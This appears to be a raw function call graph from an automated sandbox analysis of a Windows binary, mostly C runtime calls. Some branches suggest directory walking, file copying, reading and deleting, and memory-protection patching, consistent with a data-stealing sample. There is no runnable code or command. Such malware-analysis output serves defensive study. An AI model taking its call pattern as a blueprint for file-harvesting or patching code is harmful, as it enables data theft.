34f47e60 6578->6579 6580 34f47e42 6578->6580 6579->6527 6580->6579 6584 34f4925d 6580->6584 6583 34f4571e 20 API calls 6583->6579 6585 34f47e5a 6584->6585 6586 34f4926e 6584->6586 6585->6583 6587 34f49221 20 API calls 6586->6587 6588 34f49276 6587->6588 6589 34f49221 20 API calls 6588->6589 6590 34f49281 6589->6590 6591 34f49221 20 API calls 6590->6591 6592 34f4928c 6591->6592 6593 34f49221 20 API calls 6592->6593 6594 34f49297 6593->6594 6595 34f49221 20 API calls 6594->6595 6596 34f492a5 6595->6596 6597 34f4571e 20 API calls 6596->6597 6598 34f492b0 6597->6598 6599 34f4571e 20 API calls 6598->6599 6600 34f492bb 6599->6600 6601 34f4571e 20 API calls 6600->6601 6602 34f492c6 6601->6602 6603 34f49221 20 API calls 6602->6603 6604 34f492d4 6603->6604 6605 34f49221 20 API calls 6604->6605 6606 34f492e2 6605->6606 6607 34f49221 20 API calls 6606->6607 6608 34f492f3 6607->6608 6609 34f49221 20 API calls 6608->6609 6610 34f49301 6609->6610 6611 34f49221 20 API calls 6610->6611 6612 34f4930f 6611->6612 6613 34f4571e 20 API calls 6612->6613 6614 34f4931a 6613->6614 6615 34f4571e 20 API calls 6614->6615 6616 34f49325 6615->6616 6617 34f4571e 20 API calls 6616->6617 6618 34f49330 6617->6618 6619 34f4571e 20 API calls 6618->6619 6619->6585 6620->6509 6627 34f46b05 6621->6627 6630 34f46baf 6621->6630 6624 34f42ada 5 API calls 6626 34f46c5b 6624->6626 6626->6314 6631 34f486e4 6627->6631 6629 34f48a3e 43 API calls 6629->6630 6630->6624 6632 34f454a7 38 API calls 6631->6632 6633 34f48704 MultiByteToWideChar 6632->6633 6635 34f48742 6633->6635 6636 34f487da 6633->6636 6639 34f456d0 21 API calls 6635->6639 6642 34f48763 6635->6642 6637 34f42ada 5 API calls 6636->6637 6640 34f46b66 6637->6640 6638 34f487d4 6650 34f48801 6638->6650 6639->6642 6645 34f48a3e 6640->6645 6642->6638 6643 34f487a8 MultiByteToWideChar 6642->6643 6643->6638 6644 34f487c4 GetStringTypeW 6643->6644 6644->6638 6646 34f454a7 38 API calls 6645->6646 6647 34f48a51 6646->6647 6654 34f48821 6647->6654 6651 34f4880d 6650->6651 6652 34f4881e 6650->6652 6651->6652 6653 34f4571e 20 API calls 6651->6653 6652->6636 6653->6652 6655 34f4883c 6654->6655 6656 34f48862 MultiByteToWideChar 6655->6656 6657 34f4888c 6656->6657 6658 34f48a16 6656->6658 6661 34f456d0 21 API calls 6657->6661 6664 34f488ad 6657->6664 6659 34f42ada 5 API calls 6658->6659 6660 34f46b87 6659->6660 6660->6629 6661->6664 6662 34f488f6 MultiByteToWideChar 6663 34f48962 6662->6663 6665 34f4890f 6662->6665 6667 34f48801 20 API calls 6663->6667 6664->6662 6664->6663 6681 34f45f19 6665->6681 6667->6658 6669 34f48971 6673 34f456d0 21 API calls 6669->6673 6676 34f48992 6669->6676 6670 34f48939 6670->6663 6672 34f45f19 11 API calls 6670->6672 6671 34f48a07 6675 34f48801 20 API calls 6671->6675 6672->6663 6673->6676 6674 34f45f19 11 API calls 6677 34f489e6 6674->6677 6675->6663 6676->6671 6676->6674 6677->6671 6678 34f489f5 WideCharToMultiByte 6677->6678 6678->6671 6679 34f48a35 6678->6679 6680 34f48801 20 API calls 6679->6680 6680->6663 6682 34f45c45 5 API calls 6681->6682 6683 34f45f40 6682->6683 6686 34f45f49 6683->6686 6689 34f45fa1 6683->6689 6687 34f42ada 5 API calls 6686->6687 6688 34f45f9b 6687->6688 6688->6663 6688->6669 6688->6670 6690 34f45c45 5 API calls 6689->6690 6691 34f45fc8 6690->6691 6692 34f42ada 5 API calls 6691->6692 6693 34f45f89 LCMapStringW 6692->6693 6693->6686 6695 34f46892 6694->6695 6702 34f45671 RtlEnterCriticalSection 6695->6702 6697 34f4689c 6703 34f468f1 6697->6703 6701 34f468b5 6701->6319 6702->6697 6715 34f47011 6703->6715 6705 34f4693f 6706 34f47011 26 API calls 6705->6706 6707 34f4695b 6706->6707 6708 34f47011 26 API calls 6707->6708 6709 34f46979 6708->6709 6710 34f468a9 6709->6710 6711 34f4571e 20 API calls 6709->6711 6712 34f468bd 6710->6712 6711->6710 6729 34f456b9 RtlLeaveCriticalSection 6712->6729 6714 34f468c7 6714->6701 6716 34f47022 6715->6716 6724 34f4701e 6715->6724 6717 34f47029 6716->6717 6720 34f4703c 6716->6720 6718 34f46368 20 API calls 6717->6718 6719 34f4702e 6718->6719 6721 34f462ac 26 API calls 6719->6721 6722 34f47073 6720->6722 6723 34f4706a 6720->6723 6720->6724 6721->6724 6722->6724 6726 34f46368 20 API calls 6722->6726 6725 34f46368 20 API calls 6723->6725 6724->6705 6727 34f4706f 6725->6727 6726->6727 6728 34f462ac 26 API calls 6727->6728 6728->6724 6729->6714 6731 34f4545a 6730->6731 6732 34f45468 6730->6732 6731->6732 6735 34f4547f 6731->6735 6733 34f46368 20 API calls 6732->6733 6738 34f45470 6733->6738 6734 34f462ac 26 API calls 6736 34f4547a 6734->6736 6735->6736 6737 34f46368 20 API calls 6735->6737 6736->6238 6737->6738 6738->6734 6740 34f44fd7 6739->6740 6741 34f4500d 6739->6741 6740->6239 6742 34f45024 6741->6742 6743 34f4571e 20 API calls 6741->6743 6744 34f4571e 20 API calls 6742->6744 6743->6741 6744->6740 6898 34f43c90 RtlUnwind 6993 34f45351 6995 34f45360 6993->6995 6998 34f45374 6993->6998 6994 34f4571e 20 API calls 6997 34f45386 6994->6997 6996 34f4571e 20 API calls 6995->6996 6995->6998 6996->6998 6999 34f4571e 20 API calls 6997->6999 6998->6994 7000 34f45399 6999->7000 7001 34f4571e 20 API calls 7000->7001 7002 34f453aa 7001->7002 7003 34f4571e 20 API calls 7002->7003 7004 34f453bb 7003->7004 6745 34f436d3 6746 34f436e2 6745->6746 6748 34f436f0 6745->6748 6747 34f42ada 5 API calls 6746->6747 6747->6748 7464 34f4281c 7465 34f42882 27 API calls 7464->7465 7466 34f4282a 7465->7466 6749 34f44bdd 6750 34f44bec 6749->6750 6751 34f44c08 6749->6751 6750->6751 6752 34f44bf2 6750->6752 6753 34f46d60 51 API calls 6751->6753 6754 34f46368 20 API calls 6752->6754 6755 34f44c0f GetModuleFileNameA 6753->6755 6756 34f44bf7 6754->6756 6758 34f44c33 6755->6758 6757 34f462ac 26 API calls 6756->6757 6760 34f44c01 6757->6760 6772 34f44d01 6758->6772 6762 34f44e76 20 API calls 6763 34f44c5d 6762->6763 6764 34f44c66 6763->6764 6765 34f44c72 6763->6765 6766 34f46368 20 API calls 6764->6766 6767 34f44d01 38 API calls 6765->6767 6771 34f44c6b 6766->6771 6769 34f44c88 6767->6769 6768 34f4571e 20 API calls 6768->6760 6770 34f4571e 20 API calls 6769->6770 6769->6771 6770->6771 6771->6768 6774 34f44d26 6772->6774 6776 34f44d86 6774->6776 6778 34f470eb 6774->6778 6775 34f44c50 6775->6762 6776->6775 6777 34f470eb 38 API calls 6776->6777 6777->6776 6781 34f47092 6778->6781 6782 34f454a7 38 API calls 6781->6782 6783 34f470a6 6782->6783 6783->6774 6899 34f44a9a 6900 34f45411 38 API calls 6899->6900 6901 34f44aa2 6900->6901 5726 34f41c5b 5727 34f41c6b 5726->5727 5730 34f412ee 5727->5730 5729 34f41c87 5731 34f41324 5730->5731 5732 34f413b7 GetEnvironmentVariableW 5731->5732 5756 34f410f1 5732->5756 5735 34f410f1 57 API calls 5736 34f41465 5735->5736 5737 34f410f1 57 API calls 5736->5737 5738 34f41479 5737->5738 5739 34f410f1 57 API calls 5738->5739 5740 34f4148d 5739->5740 5741 34f410f1 57 API calls 5740->5741 5742 34f414a1 5741->5742 5743 34f410f1 57 API calls 5742->5743 5744 34f414b5 lstrlenW 5743->5744 5745 34f414d2 5744->5745 5746 34f414d9 lstrlenW 5744->5746 5745->5729 5747 34f410f1 57 API calls 5746->5747 5748 34f41501 lstrlenW lstrcatW 5747->5748 5749 34f410f1 57 API calls 5748->5749 5750 34f41539 lstrlenW lstrcatW 5749->5750 5751 34f410f1 57 API calls 5750->5751 5752 34f4156b lstrlenW lstrcatW 5751->5752 5753 34f410f1 57 API calls 5752->5753 5754 34f4159d lstrlenW lstrcatW 5753->5754 5755 34f410f1 57 API calls 5754->5755 5755->5745 5757 34f41118 5756->5757 5758 34f41129 lstrlenW 5757->5758 5769 34f42c40 5758->5769 5761 34f41177 lstrlenW FindFirstFileW 5763 34f411a0 5761->5763 5764 34f411e1 5761->5764 5762 34f41168 lstrlenW 5762->5761 5765 34f411c7 FindNextFileW 5763->5765 5766 34f411aa 5763->5766 5764->5735 5765->5763 5768 34f411da FindClose 5765->5768 5766->5765 5771 34f41000 5766->5771 5768->5764 5770 34f41148 lstrcatW lstrlenW 5769->5770 5770->5761 5770->5762 5772 34f41022 5771->5772 5773 34f410af 5772->5773 5774 34f4102f lstrcatW lstrlenW 5772->5774 5777 34f410b5 lstrlenW 5773->5777 5778 34f410ad 5773->5778 5775 34f4105a lstrlenW 5774->5775 5776 34f4106b lstrlenW 5774->5776 5775->5776 5788 34f41e89 lstrlenW 5776->5788 5802 34f41e16 5777->5802 5778->5766 5781 34f41088 GetFileAttributesW 5781->5778 5783 34f4109c 5781->5783 5782 34f410ca 5782->5778 5784 34f41e89 5 API calls 5782->5784 5783->5778 5794 34f4173a 5783->5794 5785 34f410df 5784->5785 5807 34f411ea 5785->5807 5789 34f42c40 5788->5789 5790 34f41ea7 lstrcatW lstrlenW 5789->5790 5791 34f41ed1 lstrcatW 5790->5791 5792 34f41ec2 5790->5792 5791->5781 5792->5791 5793 34f41ec7 lstrlenW 5792->5793 5793->5791 5795 34f41747 5794->5795 5822 34f41cca 5795->5822 5798 34f4199f 5798->5778 5801 34f41824 5801->5798 5842 34f415da 5801->5842 5803 34f41e29 5802->5803 5806 34f41e4c 5802->5806 5804 34f41e2d lstrlenW 5803->5804 5803->5806 5805 34f41e3f lstrlenW 5804->5805 5804->5806 5805->5806 5806->5782 5808 34f4120e 5807->5808 5809 34f41e89 5 API calls 5808->5809 5810 34f41220 GetFileAttributesW 5809->5810 5811 34f41235 5810->5811 5812 34f41246 5810->5812 5811->5812 5814 34f4173a 35 API calls 5811->5814 5813 34f41e89 5 API calls 5812->5813 5815 34f41258 5813->5815 5814->5812 5816 34f410f1 56 API calls 5815->5816 5817 34f4126d 5816->5817 5818 34f41e89 5 API calls 5817->5818 5819 34f4127f 5818->5819 5820 34f410f1 56 API calls 5819->5820 5821 34f412e6 5820->5821 5821->5778 5823 34f41cf1 5822->5823 5824 34f41d0f CopyFileW CreateFileW 5823->5824 5825 34f41d44 DeleteFileW 5824->5825 5826 34f41d55 GetFileSize 5824->5826 5831 34f41808 5825->5831 5827 34f41ede 22 API calls 5826->5827 5828 34f41d66 ReadFile 5827->5828 5829 34f41d94 CloseHandle DeleteFileW 5828->5829 5830 34f41d7d CloseHandle DeleteFileW 5828->5830 5829->5831 5830->5831 5831->5798 5832 34f41ede 5831->5832 5834 34f4222f 5832->5834 5835 34f4224e 5834->5835 5838 34f42250 5834->5838 5850 34f4474f 5834->5850 5855 34f447e5 5834->5855 5835->5801 5837 34f42908 5839 34f435d2 RaiseException 5837->5839 5838->5837 5862 34f435d2 5838->5862 5841 34f42925 5839->5841 5841->5801 5843 34f4160c 5842->5843 5844 34f4163c lstrlenW 5843->5844 5950 34f41c9d 5844->5950 5846 34f41655 lstrcatW lstrlenW 5847 34f41678 5846->5847 5848 34f41693 5847->5848 5849 34f4167e lstrcatW 5847->5849 5848->5801 5849->5848 5865 34f44793 5850->5865 5853 34f4478f 5853->5834 5854 34f44765 5871 34f42ada 5854->5871 5859 34f456d0 5855->5859 5856 34f4570e 5884 34f46368 5856->5884 5858 34f456f9 RtlAllocateHeap 5858->5859 5860 34f4570c 5858->5860 5859->5856 5859->5858 5861 34f4474f 7 API calls 5859->5861 5860->5834 5861->5859 5864 34f435f2 RaiseException 5862->5864 5864->5837 5866 34f4479f 5865->5866 5878 34f45671 RtlEnterCriticalSection 5866->5878 5868 34f447aa 5879 34f447dc 5868->5879 5870 34f447d1 5870->5854 5872 34f42ae5 IsProcessorFeaturePresent 5871->5872 5873 34f42ae3 5871->5873 5875 34f42b58 5872->5875 5873->5853 5883 34f42b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5875->5883 5877 34f42c3b 5877->5853 5878->5868 5882 34f456b9 RtlLeaveCriticalSection 5879->5882 5881 34f447e3 5881->5870 5882->5881 5883->5877 5887 34f45b7a GetLastError 5884->5887 5888 34f45b93 5887->5888 5889 34f45b99 5887->5889 5906 34f45e08 5888->5906 5893 34f45bf0 SetLastError 5889->5893 5913 34f4637b 5889->5913 5895 34f45bf9 5893->5895 5894 34f45bb3 5920 34f4571e 5894->5920 5895->5860 5899 34f45bcf 5933 34f4593c 5899->5933 5900 34f45bb9 5902 34f45be7 SetLastError 5900->5902 5902->5895 5904 34f4571e 17 API calls 5905 34f45be0 5904->5905 5905->5893 5905->5902 5938 34f45c45 5906->5938 5908 34f45e2f 5909 34f45e47 TlsGetValue 5908->5909 5912 34f45e3b 5908->5912 5909->5912 5910 34f42ada 5 API calls 5911 34f45e58 5910->5911 5911->5889 5912->5910 5918 34f46388 5913->5918 5914 34f463c8 5917 34f46368 19 API calls 5914->5917 5915 34f463b3 RtlAllocateHeap 5916 34f45bab 5915->5916 5915->5918 5916->5894 5926 34f45e5e 5916->5926 5917->5916 5918->5914 5918->5915 5919 34f4474f 7 API calls 5918->5919 5919->5918 5921 34f45729 HeapFree 5920->5921 5925 34f45752 5920->5925 5922 34f4573e 5921->5922 5921->5925 5923 34f46368 18 API calls 5922->5923 5924 34f45744 GetLastError 5923->5924 5924->5925 5925->5900 5927 34f45c45 5 API calls 5926->5927 5928 34f45e85 5927->5928 5929 34f45ea0 TlsSetValue 5928->5929 5930 34f45e94 5928->5930 5929->5930 5931 34f42ada 5 API calls 5930->5931 5932 34f45bc8 5931->5932 5932->5894 5932->5899 5944 34f45914 5933->5944 5942 34f45c71 5938->5942 5943 34f45c75 5938->5943 5939 34f45c95 5941 34f45ca1 GetProcAddress 5939->5941 5939->5943 5940 34f45ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5940->5942 5941->5943 5942->5939 5942->5940 5942->5943 5943->5908 5945 34f45854 RtlEnterCriticalSection RtlLeaveCriticalSection 5944->5945 5946 34f45938 5945->5946 5947 34f458c4 5946->5947 5948 34f45758 20 API calls 5947->5948 5949 34f458e8 5948->5949 5949->5904 5951 34f41ca6 5950->5951 5951->5846 5691 34f4c7c4 5702 34f4c7e6 GetModuleHandleA 5691->5702 5693 34f4c7dd 5695 34f4c82c 5693->5695 5696 34f4c800 GetProcAddress 5693->5696 5701 34f4c83f 5693->5701 5694 34f4c85f GetProcAddress 5694->5695 5698 34f4c835 GetModuleHandleA 5695->5698 5699 34f4c872 LdrInitializeThunk 5695->5699 5695->5701 5696->5695 5697 34f4c80d VirtualProtect 5696->5697 5697->5695 5700 34f4c81c VirtualProtect 5697->5700 5698->5701 5700->5695 5701->5694 5701->5695 5701->5701 5703 34f4c7ef 5702->5703 5710 34f4c82c 5702->5710 5714 34f4c803 GetProcAddress 5703->5714 5705 34f4c835 GetModuleHandleA 5712 34f4c83f 5705->5712 5706 34f4c872 LdrInitializeThunk 5707 34f4c7f4 5708 34f4c800 GetProcAddress 5707->5708 5707->5710 5709 34f4c80d VirtualProtect 5708->5709 5708->5710 5709->5710 5711 34f4c81c VirtualProtect 5709->5711 5710->5705 5710->5706 5710->5712 5711->5710 5712->5710 5713 34f4c85f GetProcAddress 5712->5713 5713->5710 5715 34f4c82c 5714->5715 5716 34f4c80d VirtualProtect 5714->5716 5718 34f4c835 GetModuleHandleA 5715->5718 5719 34f4c872 LdrInitializeThunk 5715->5719 5716->5715 5717 34f4c81c VirtualProtect 5716->5717 5717->5715 5721 34f4c83f 5718->5721 5720 34f4c85f GetProcAddress 5720->5721 5721->5715 5721->5720 7005 34f4a945 7007 34f4a96d 7005->7007 7006 34f4a9a5 7007->7006 7008 34f4a997 7007->7008 7009 34f4a99e 7007->7009 7014 34f4aa17 7008->7014 7018 34f4aa00 7009->7018 7015 34f4aa20 7014->7015 7022 34f4b19b 7015->7022 7019 34f4aa20 7018->7019 7020 34f4b19b 21 API calls 7019->7020 7021 34f4a9a3 7020->7021 7023 34f4b1da 7022->7023 7028 34f4b25c 7023->7028 7032 34f4b59e 7023->7032 7025 34f4b286 7026 34f4b8b2 20 API calls 7025->7026 7027 34f4b292 7025->7027 7026->7027 7030 34f42ada 5 API calls 7027->7030 7028->7025 7029 34f478a3 5 API calls 7028->7029 7029->7025 7031 34f4a99c 7030->7031 7033 34f4b5c1 RaiseException 7032->7033 7034 34f4b5bc 7033->7034 7034->7028 6784 34f4a1c6 IsProcessorFeaturePresent 6785 34f47bc7 6786 34f47bd3 6785->6786 6787 34f47c0a 6786->6787 6793 34f45671 RtlEnterCriticalSection 6786->6793 6789 34f47be7 6790 34f47f86 20 API calls 6789->6790 6791 34f47bf7 6790->6791 6794 34f47c10 6791->6794 6793->6789 6797 34f456b9 RtlLeaveCriticalSection 6794->6797 6796 34f47c17 6796->6787 6797->6796 6902 34f47a80 6903 34f47a8d 6902->6903 6904 34f4637b 20 API calls 6903->6904 6905 34f47aa7 6904->6905 6906 34f4571e 20 API calls 6905->6906 6907 34f47ab3 6906->6907 6908 34f4637b 20 API calls 6907->6908 6911 34f47ad9 6907->6911 6910 34f47acd 6908->6910 6909 34f45eb7 11 API calls 6909->6911 6912 34f4571e 20 API calls 6910->6912 6911->6909 6913 34f47ae5 6911->6913 6912->6911 7035 34f48640 7038 34f48657 7035->7038 7039 34f48665 7038->7039 7040 34f48679 7038->7040 7041 34f46368 20 API calls 7039->7041 7042 34f48681 7040->7042 7043 34f48693 7040->7043 7044 34f4866a 7041->7044 7045 34f46368 20 API calls 7042->7045 7048 34f454a7 38 API calls 7043->7048 7050 34f48652 7043->7050 7046 34f462ac 26 API calls 7044->7046 7047 34f48686 7045->7047 7046->7050 7049 34f462ac 26 API calls 7047->7049 7048->7050 7049->7050 7051 34f4af43 7052 34f4af4d 7051->7052 7053 34f4af59 7051->7053 7052->7053 7054 34f4af52 CloseHandle 7052->7054 7054->7053 7467 34f47103 GetCommandLineA GetCommandLineW 7468 34f45303 7471 34f450a5 7468->7471 7480 34f4502f 7471->7480 7474 34f4502f 5 API calls 7475 34f450c3 7474->7475 7476 34f45000 20 API calls 7475->7476 7477 34f450ce 7476->7477 7478 34f45000 20 API calls 7477->7478 7479 34f450d9 7478->7479 7481 34f45048 7480->7481 7482 34f42ada 5 API calls 7481->7482 7483 34f45069 7482->7483 7483->7474 7484 34f4220c 7485 34f42215 7484->7485 7486 34f4221a 7484->7486 7490 34f422b1 7485->7490 7494 34f420db 7486->7494 7489 34f42228 7491 34f422c7 7490->7491 7493 34f422d0 7491->7493 7502 34f42264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7491->7502 7493->7486 7495 34f420e7 7494->7495 7499 34f4210b 7495->7499 7501 34f420f6 7495->7501 7503 34f41eec 7495->7503 7497 34f4216d 7498 34f41eec 50 API calls 7497->7498 7497->7501 7498->7501 7499->7497 7500 34f41eec 50 API calls 7499->7500 7499->7501 7500->7497 7501->7489 7502->7493 7504 34f41ef7 7503->7504 7505 34f41f2a 7503->7505 7507 34f41f1c 7504->7507 7508 34f41efc 7504->7508 7546 34f42049 7505->7546 7528 34f41f3f 7507->7528 7510 34f41f01 7508->7510 7511 34f41f12 7508->7511 7514 34f41f06 7510->7514 7515 34f4240b 7510->7515 7520 34f423ec 7511->7520 7514->7499 7560 34f453e5 7515->7560 7656 34f43513 7520->7656 7525 34f42408 7525->7514 7526 34f4351e 7 API calls 7527 34f423f5 7526->7527 7527->7514 7529 34f41f4b 7528->7529 7674 34f4247c 7529->7674 7531 34f41f52 7532 34f42041 7531->7532 7533 34f41f7c 7531->7533 7542 34f41f57 7531->7542 7697 34f42639 IsProcessorFeaturePresent 7532->7697 7685 34f423de 7533->7685 7536 34f42048 7537 34f41f8b 7537->7542 7688 34f422fc RtlInitializeSListHead 7537->7688 7539 34f41f99 7689 34f446c5 7539->7689 7542->7514 7544 34f41fb8 7544->7542 7545 34f44669 5 API calls 7544->7545 7545->7542 7547 34f42055 7546->7547 7548 34f420d3 7547->7548 7549 34f4207d 7547->7549 7559 34f4205e 7547->7559 7551 34f42639 4 API calls 7548->7551 7749 34f4244c 7549->7749 7552 34f420da 7551->7552 7553 34f42082 7758 34f42308 7553->7758 7555 34f42087 7761 34f420c4 7555->7761 7557 34f4209f 7764 34f4260b 7557->7764 7559->7514 7566 34f45aca 7560->7566 7563 34f4351e 7640 34f43820 7563->7640 7565 34f42415 7565->7514 7567 34f45ad4 7566->7567 7568 34f42410 7566->7568 7569 34f45e08 11 API calls 7567->7569 7568->7563 7570 34f45adb 7569->7570 7570->7568 7571 34f45e5e 11 API calls 7570->7571 7572 34f45aee 7571->7572 7574 34f459b5 7572->7574 7575 34f459c0 7574->7575 7576 34f459d0 7574->7576 7580 34f459d6 7575->7580 7576->7568 7579 34f4571e 20 API calls 7579->7576 7581 34f459ef 7580->7581 7582 34f459e9 7580->7582 7584 34f4571e 20 API calls 7581->7584 7583 34f4571e 20 API calls 7582->7583 7583->7581 7585 34f459fb 7584->7585 7586 34f4571e 20 API calls 7585->7586 7587 34f45a06 7586->7587 7588 34f4571e 20 API calls 7587->7588 7589 34f45a11 7588->7589 7590 34f4571e 20 API calls 7589->7590 7591 34f45a1c 7590->7591 7592 34f4571e 20 API calls 7591->7592 7593 34f45a27 7592->7593 7594 34f4571e 20 API calls 7593->7594 7595 34f45a32 7594->7595 7596 34f4571e 20 API calls 7595->7596 7597 34f45a3d 7596->7597 7598 34f4571e 20 API calls 7597->7598 7599 34f45a48 7598->7599 7600 34f4571e 20 API calls 7599->7600 7601 34f45a56 7600->7601 7606 34f4589c 7601->7606 7612 34f457a8 7606->7612 7608 34f458c0 7609 34f458ec 7608->7609 7624 34f45809 7609->7624 7611 34f45910 7611->7579 7613 34f457b4 7612->7613 7620 34f45671 RtlEnterCriticalSection 7613->7620 7615 34f457e8 7621 34f457fd 7615->7621 7617 34f457be 7617->7615 7619 34f4571e 20 API calls 7617->7619 7618 34f457f5 7618->7608 7619->7615 7620->7617 7622 34f456b9 RtlLeaveCriticalSection 7621->7622 7623 34f45807 7622->7623 7623->7618 7625 34f45815 7624->7625 7632 34f45671 RtlEnterCriticalSection 7625->7632 7627 34f4581f 7633 34f45a7f 7627->7633 7629 34f45832 7637 34f45848 7629->7637 7631 34f45840 7631->7611 7632->7627 7634 34f45a8e 7633->7634 7636 34f45ab5 7633->7636 7635 34f47cc2 20 API calls 7634->7635 7634->7636 7635->7636 7636->7629 7638 34f456b9 RtlLeaveCriticalSection 7637->7638 7639 34f45852 7638->7639 7639->7631 7641 34f4384b 7640->7641 7642 34f4382d 7640->7642 7641->7565 7645 34f4383b 7642->7645 7646 34f43b67 7642->7646 7651 34f43ba2 7645->7651 7647 34f43a82 5 API calls 7646->7647 7648 34f43b81 7647->7648 7649 34f43b99 TlsGetValue 7648->7649 7650 34f43b8d 7648->7650 7649->7650 7650->7645 7652 34f43a82 5 API calls 7651->7652 7653 34f43bbc 7652->7653 7654 34f43bd7 TlsSetValue 7653->7654 7655 34f43bcb 7653->7655 7654->7655 7655->7641 7662 34f43856 7656->7662 7658 34f423f1 7658->7527 7659 34f453da 7658->7659 7660 34f45b7a 20 API calls 7659->7660 7661 34f423fd 7660->7661 7661->7525 7661->7526 7663 34f43862 GetLastError 7662->7663 7664 34f4385f 7662->7664 7665 34f43b67 6 API calls 7663->7665 7664->7658 7666 34f43877 7665->7666 7667 34f438dc SetLastError 7666->7667 7668 34f43ba2 6 API calls 7666->7668 7673 34f43896 7666->7673 7667->7658 7669 34f43890 7668->7669 7670 34f438b8 7669->7670 7671 34f43ba2 6 API calls 7669->7671 7669->7673 7672 34f43ba2 6 API calls 7670->7672 7670->7673 7671->7670 7672->7673 7673->7667 7675 34f42485 7674->7675 7701 34f42933 IsProcessorFeaturePresent 7675->7701 7679 34f42496 7684 34f4249a 7679->7684 7712 34f453c8 7679->7712 7682 34f424b1 7682->7531 7683 34f43529 8 API calls 7683->7684 7684->7531 7743 34f424b5 7685->7743 7687 34f423e5 7687->7537 7688->7539 7690 34f446dc 7689->7690 7691 34f42ada 5 API calls 7690->7691 7692 34f41fad 7691->7692 7692->7542 7693 34f423b3 7692->7693 7694 34f423b8 7693->7694 7695 34f42933 IsProcessorFeaturePresent 7694->7695 7696 34f423c1 7694->7696 7695->7696 7696->7544 7698 34f4264e 7697->7698 7699 34f426f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7698->7699 7700 34f42744 7699->7700 7700->7536 7702 34f42491 7701->7702 7703 34f434ea 7702->7703 7704 34f434ef 7703->7704 7715 34f43936 7704->7715 7708 34f43505 7709 34f43510 7708->7709 7710 34f43972 RtlDeleteCriticalSection 7708->7710 7709->7679 7711 34f434fd 7710->7711 7711->7679 7739 34f47457 7712->7739 7716 34f4393f 7715->7716 7718 34f43968 7716->7718 7720 34f434f9 7716->7720 7729 34f43be0 7716->7729 7719 34f43972 RtlDeleteCriticalSection 7718->7719 7719->7720 7720->7711 7721 34f438e8 7720->7721 7734 34f43af1 7721->7734 7724 34f43ba2 6 API calls 7725 34f4390b 7724->7725 7726 34f43918 7725->7726 7727 34f4391b 6 API calls 7725->7727 7726->7708 7728 34f438fd 7727->7728 7728->7708 7730 34f43a82 5 API calls 7729->7730 7731 34f43bfa 7730->7731 7732 34f43c18 InitializeCriticalSectionAndSpinCount 7731->7732 7733 34f43c03 7731->7733 7732->7733 7733->7716 7735 34f43a82 5 API calls 7734->7735 7736 34f43b0b 7735->7736 7737 34f43b24 TlsAlloc 7736->7737 7738 34f438f2 7736->7738 7738->7724 7738->7728 7742 34f47470 7739->7742 7740 34f42ada 5 API calls 7741 34f424a3 7740->7741 7741->7682 7741->7683 7742->7740 7744 34f424c4 7743->7744 7745 34f424c8 7743->7745 7744->7687 7746 34f42639 4 API calls 7745->7746 7748 34f424d5 7745->7748 7747 34f42559 7746->7747 7748->7687 7750 34f42451 7749->7750 7751 34f42455 7750->7751 7754 34f42461 7750->7754 7752 34f4527a 20 API calls 7751->7752 7753 34f4245f 7752->7753 7753->7553 7755 34f4246e 7754->7755 7756 34f4499b 28 API calls 7754->7756 7755->7553 7757 34f44bbd 7756->7757 7757->7553 7770 34f434c7 RtlInterlockedFlushSList 7758->7770 7760 34f42312 7760->7555 7772 34f4246f 7761->7772 7763 34f420c9 7763->7557 7765 34f42617 7764->7765 7766 34f4262d 7765->7766 7780 34f453ed 7765->7780 7766->7559 7769 34f43529 8 API calls 7769->7766 7771 34f434d7 7770->7771 7771->7760 7777 34f453ff 7772->7777 7775 34f4391b 6 API calls 7776 34f4354d 7775->7776 7776->7763 7778 34f45c2b 11 API calls 7777->7778 7779 34f42476 7778->7779 7779->7775 7783 34f474da 7780->7783 7786 34f474f3 7783->7786 7784 34f42ada 5 API calls 7785 34f42625 7784->7785 7785->7769 7786->7784 7055 34f4724e GetProcessHeap 7056 34f4284f 7059 34f42882 7056->7059 7062 34f43550 7059->7062 7061 34f4285d 7063 34f4355d 7062->7063 7066 34f4358a 7062->7066 7064 34f447e5 21 API calls 7063->7064 7063->7066 7065 34f4357a 7064->7065 7065->7066 7067 34f4544d 26 API calls 7065->7067 7066->7061 7067->7066 6798 405b7c lstrlenW 6799 405b8a 6798->6799 6800 405b90 CharPrevW 6799->6800 6801 405b9c 6799->6801 6800->6799 6800->6801 7068 34f45348 7071 34f43529 7068->7071 7072 34f43543 7071->7072 7073 34f43532 7071->7073 7079 34f4391b 7073->7079 7080 34f43925 7079->7080 7081 34f43537 7079->7081 7091 34f43b2c 7080->7091 7083 34f43972 7081->7083 7084 34f4353c 7083->7084 7085 34f4397d 7083->7085 7087 34f43c50 7084->7087 7086 34f43987 RtlDeleteCriticalSection 7085->7086 7086->7084 7086->7086 7088 34f43c7f 7087->7088 7089 34f43c59 7087->7089 7088->7072 7089->7088 7090 34f43c69 FreeLibrary 7089->7090 7090->7089 7096 34f43a82 7091->7096 7093 34f43b46 7094 34f43b5e TlsFree 7093->7094 7095 34f43b52 7093->7095 7094->7095 7095->7081 7097 34f43aaa 7096->7097 7101 34f43aa6 7096->7101 7097->7101 7102 34f439be 7097->7102 7100 34f43ac4 GetProcAddress 7100->7101 7101->7093 7107 34f439cd 7102->7107 7103 34f43a77 7103->7100 7103->7101 7104 34f439ea LoadLibraryExW 7105 34f43a05 GetLastError 7104->7105 7104->7107 7105->7107 7106 34f43a60 FreeLibrary 7106->7107 7107->7103 7107->7104 7107->7106 7108 34f43a38 LoadLibraryExW 7107->7108 7108->7107 7109 34f47b48 7119 34f48ebf 7109->7119 7113 34f47b55 7132 34f4907c 7113->7132 7116 34f47b7f 7117 34f4571e 20 API calls 7116->7117 7118 34f47b8a 7117->7118 7136 34f48ec8 7119->7136 7121 34f47b50 7122 34f48fdc 7121->7122 7123 34f48fe8 7122->7123 7156 34f45671 RtlEnterCriticalSection 7123->7156 7125 34f4905e 7170 34f49073 7125->7170 7126 34f48ff3 7126->7125 7129 34f49032 RtlDeleteCriticalSection 7126->7129 7157 34f4a09c 7126->7157 7128 34f4906a 7128->7113 7131 34f4571e 20 API calls 7129->7131 7131->7126 7133 34f47b64 RtlDeleteCriticalSection 7132->7133 7134 34f49092 7132->7134 7133->7113 7133->7116 7134->7133 7135 34f4571e 20 API calls 7134->7135 7135->7133 7137 